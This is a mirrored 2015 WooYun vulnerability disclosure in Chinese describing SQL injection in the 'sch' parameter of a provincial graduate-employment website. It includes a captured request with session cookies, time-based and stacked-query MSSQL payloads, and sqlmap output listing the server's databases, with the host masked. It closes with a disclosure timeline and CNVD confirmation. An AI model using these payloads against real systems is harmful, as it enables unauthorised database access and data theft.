乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-12: 细节已通知厂商并且等待厂商处理中 2015-10-16: 厂商已经确认,细节仅向厂商公开 2015-10-26: 细节向核心白帽子及相关领域专家公开 2015-11-05: 细节向普通白帽子公开 2015-11-15: 细节向实习白帽子公开 2015-11-30: 细节向公众公开
RT
GET /hnbys/archives.do?m=findStu&page=70&sch=*&t=4197&year=2015 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://**.**.**.**:80/Cookie: JSESSIONID=413FAE4792AB35F1739F53724F48B480.tomcat1; JSESSIONID=413FAE4792AB35F1739F53724F48B480.tomcat1; AJSTAT_ok_pages=80; AJSTAT_ok_times=1; ncss_stusite=0%40%4043%40%404301%40%40%E6%B9%96%E5%8D%97%E7%9C%81%E6%95%99%E8%82%B2%E5%8E%85%40%40%E6%B9%96%E5%8D%97%E7%9C%81%E6%AF%95%E4%B8%9A%E7%94%9F%E5%B0%B1%E4%B8%9A%E7%BD%91; BIGipServersanheyi=219130048.20480.0000; PHPSESSID=nchg322qv2dca86p0f40pjult6Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
sch参数存在注入
sqlmap identified the following injection points with a total of 75 HTTP(s) requests:---Parameter: #1* (URI) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: http://**.**.**.**:80/hnbys/archives.do?m=findStu&page=70&sch='; WAITFOR DELAY '0:0:5'--&t=4197&year=2015 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: http://**.**.**.**:80/hnbys/archives.do?m=findStu&page=70&sch=' WAITFOR DELAY '0:0:5'--&t=4197&year=2015---web application technology: JSPback-end DBMS: Microsoft SQL Server 2012available databases [8]:[*] hnbys[*] hnbyssitedb[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb
危害等级:高
漏洞Rank:10
确认时间:2015-10-16 14:26
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。
暂无